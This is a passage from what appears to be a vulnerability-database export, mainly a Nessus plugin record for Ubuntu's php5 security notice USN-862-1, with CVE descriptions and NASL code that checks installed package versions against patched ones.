res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~4.3.4~4.30.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~4.3.4~4.30.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.4~1.8.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-01T06:57:13", "description": "Maksymilian Arciemowicz discovered that PHP did not properly validate\narguments to the dba_replace function. If a script passed untrusted\ninput to the dba_replace function, an attacker could truncate the\ndatabase. This issue only applied to Ubuntu 6.06 LTS, 8.04 LTS, and\n8.10. (CVE-2008-7068)\n\nIt was discovered that PHP's php_openssl_apply_verification_policy\nfunction did not correctly handle SSL certificates with zero bytes in\nthe Common Name. A remote attacker could exploit this to perform a man\nin the middle attack to view sensitive information or alter encrypted\ncommunications. (CVE-2009-3291)\n\nIt was discovered that PHP did not properly handle certain malformed\nimages when being parsed by the Exif module. A remote attacker could\nexploit this flaw and cause the PHP server to crash, resulting in a\ndenial of service. (CVE-2009-3292)\n\nGrzegorz Stachowiak discovered that PHP did not properly enforce\nrestrictions in the tempnam function. An attacker could exploit this\nissue to bypass safe_mode restrictions. (CVE-2009-3557)\n\nGrzegorz Stachowiak discovered that PHP did not properly enforce\nrestrictions in the posix_mkfifo function. An attacker could exploit\nthis issue to bypass open_basedir restrictions. 
(CVE-2009-3558)\n\nBogdan Calin discovered that PHP did not limit the number of temporary\nfiles created when handling multipart/form-data POST requests. A\nremote attacker could exploit this flaw and cause the PHP server to\nconsume all available resources, resulting in a denial of service.\n(CVE-2009-4017)\n\nATTENTION: This update changes previous PHP behaviour by limiting the\nnumber of files in a POST request to 50. This may be increased by\nadding a 'max_file_uploads' directive to the php.ini configuration\nfile.\n\nIt was discovered that PHP did not properly enforce restrictions in\nthe proc_open function. An attacker could exploit this issue to bypass\nsafe_mode_protected_env_vars restrictions and possibly execute\narbitrary code with application privileges. (CVE-2009-4018).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "published": "2009-11-30T00:00:00", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 / 9.10 : php5 vulnerabilities (USN-862-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3558", "CVE-2009-4018", "CVE-2009-3292", "CVE-2008-7068", "CVE-2009-4017", "CVE-2009-3291", "CVE-2009-3557"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5", "p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5filter", "p-cpe:/a:canonical:ubuntu_linux:php5-mhash", "p-cpe:/a:canonical:ubuntu_linux:php5-curl", "p-cpe:/a:canonical:ubuntu_linux:php5-pspell", "p-cpe:/a:canonical:ubuntu_linux:php5-mysql", "p-cpe:/a:canonical:ubuntu_linux:php5-cgi", "p-cpe:/a:canonical:ubuntu_linux:php5-cli", "p-cpe:/a:canonical:ubuntu_linux:php5-odbc", "p-cpe:/a:canonical:ubuntu_linux:php5-sqlite", "p-cpe:/a:canonical:ubuntu_linux:php5-xmlrpc", "p-cpe:/a:canonical:ubuntu_linux:php5-gd", 
"p-cpe:/a:canonical:ubuntu_linux:php5-xsl", "p-cpe:/a:canonical:ubuntu_linux:php5-sybase", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:php5-dev", "p-cpe:/a:canonical:ubuntu_linux:php5-common", "p-cpe:/a:canonical:ubuntu_linux:php5-pgsql", "p-cpe:/a:canonical:ubuntu_linux:php5-dbg", "cpe:/o:canonical:ubuntu_linux:9.10", "p-cpe:/a:canonical:ubuntu_linux:php5-mysqli", "p-cpe:/a:canonical:ubuntu_linux:php5-ldap", "p-cpe:/a:canonical:ubuntu_linux:php5-tidy", "cpe:/o:canonical:ubuntu_linux:8.10", "p-cpe:/a:canonical:ubuntu_linux:php5-recode", "p-cpe:/a:canonical:ubuntu_linux:php5", "cpe:/o:canonical:ubuntu_linux:9.04", "p-cpe:/a:canonical:ubuntu_linux:php5-snmp", "p-cpe:/a:canonical:ubuntu_linux:php5-gmp", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts", "p-cpe:/a:canonical:ubuntu_linux:php-pear"], "id": "UBUNTU_USN-862-1.NASL", "href": "https://www.tenable.com/plugins/nessus/42930", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-862-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42930);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:33:02\");\n\n script_cve_id(\"CVE-2008-7068\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4018\");\n script_bugtraq_id(36449, 37079, 37138);\n script_xref(name:\"USN\", value:\"862-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 / 9.10 : php5 vulnerabilities (USN-862-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Maksymilian Arciemowicz discovered that PHP did not properly validate\narguments to the dba_replace function. If a script passed untrusted\ninput to the dba_replace function, an attacker could truncate the\ndatabase. This issue only applied to Ubuntu 6.06 LTS, 8.04 LTS, and\n8.10. (CVE-2008-7068)\n\nIt was discovered that PHP's php_openssl_apply_verification_policy\nfunction did not correctly handle SSL certificates with zero bytes in\nthe Common Name. A remote attacker could exploit this to perform a man\nin the middle attack to view sensitive information or alter encrypted\ncommunications. (CVE-2009-3291)\n\nIt was discovered that PHP did not properly handle certain malformed\nimages when being parsed by the Exif module. A remote attacker could\nexploit this flaw and cause the PHP server to crash, resulting in a\ndenial of service. (CVE-2009-3292)\n\nGrzegorz Stachowiak discovered that PHP did not properly enforce\nrestrictions in the tempnam function. An attacker could exploit this\nissue to bypass safe_mode restrictions. 
(CVE-2009-3557)\n\nGrzegorz Stachowiak discovered that PHP did not properly enforce\nrestrictions in the posix_mkfifo function. An attacker could exploit\nthis issue to bypass open_basedir restrictions. (CVE-2009-3558)\n\nBogdan Calin discovered that PHP did not limit the number of temporary\nfiles created when handling multipart/form-data POST requests. A\nremote attacker could exploit this flaw and cause the PHP server to\nconsume all available resources, resulting in a denial of service.\n(CVE-2009-4017)\n\nATTENTION: This update changes previous PHP behaviour by limiting the\nnumber of files in a POST request to 50. This may be increased by\nadding a 'max_file_uploads' directive to the php.ini configuration\nfile.\n\nIt was discovered that PHP did not properly enforce restrictions in\nthe proc_open function. An attacker could exploit this issue to bypass\nsafe_mode_protected_env_vars restrictions and possibly execute\narbitrary code with application privileges. (CVE-2009-4018).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/862-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-ldap\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mysqli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security 
Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|8\\.04|8\\.10|9\\.04|9\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 8.10 / 9.04 / 9.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php-pear\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-cgi\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-cli\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-common\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-curl\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-dev\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-gd\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif 
(ubuntu_check(osver:\"6.06\", pkgname:\"php5-ldap\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mhash\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mysql\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mysqli\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-odbc\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-pgsql\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-recode\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-snmp\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-sqlite\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-sybase\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-xmlrpc\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-xsl\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php-pear\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-cgi\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-cli\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-common\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-curl\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-dev\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-gd\", 
pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-gmp\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-ldap\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-mhash\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-mysql\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-odbc\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-pgsql\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-pspell\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-recode\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-snmp\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-sqlite\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-sybase\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-tidy\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-xmlrpc\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-xsl\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libapache2-mod-php5filter\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php-pear\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-cgi\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-cli\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif 
(ubuntu_check(osver:\"8.10\", pkgname:\"php5-common\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-curl\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-dbg\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-dev\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-gd\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-gmp\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-ldap\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-mhash\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-mysql\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-odbc\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-pgsql\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-pspell\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-recode\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-snmp\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-sqlite\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-sybase\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-tidy\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-xmlrpc\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-xsl\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libapache2-mod-php5filter\", 
pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php-pear\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-cgi\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-cli\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-common\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-curl\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-dbg\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-dev\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-gd\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-gmp\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-ldap\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-mhash\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-mysql\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-odbc\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-pgsql\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-pspell\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-recode\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-snmp\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-sqlite\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif 
(ubuntu_check(osver:\"9.04\", pkgname:\"php5-sybase\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-tidy\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-xmlrpc\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-xsl\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libapache2-mod-php5filter\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php-pear\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-cgi\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-cli\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-common\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-curl\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-dbg\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-dev\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-gd\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-gmp\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-ldap\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-mhash\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-mysql\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif 
(ubuntu_check(osver:\"9.10\", pkgname:\"php5-odbc\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-pgsql\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-pspell\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-recode\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-snmp\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-sqlite\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-sybase\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-tidy\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-xmlrpc\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", 